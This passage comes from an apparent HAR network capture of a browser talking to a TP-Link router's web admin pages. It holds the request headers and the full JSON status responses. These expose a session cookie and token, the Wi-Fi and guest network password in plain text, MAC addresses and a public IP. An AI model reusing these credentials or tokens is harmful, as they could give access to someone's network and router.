\"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": 
\"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"gu
est_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\
"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\
\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 274,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:19.654+03:00\",\r\n \"time\": 1814,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n 
},\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 251,\r\n \"connect\": 532,\r\n \"send\": 0,\r\n \"wait\": 761,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n 
\"startedDateTime\": \"2018-07-17T13:11:29.645+03:00\",\r\n \"time\": 952,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n 
\"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",
\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wire
less_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"187.60.220.34\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6
_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 657,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:29.648+03:00\",\r\n \"time\": 1798,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": 
\"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 268,\r\n \"dns\": 250,\r\n \"connect\": 524,\r\n \"send\": 0,\r\n \"wait\": 748,\r\n \"receive\": 
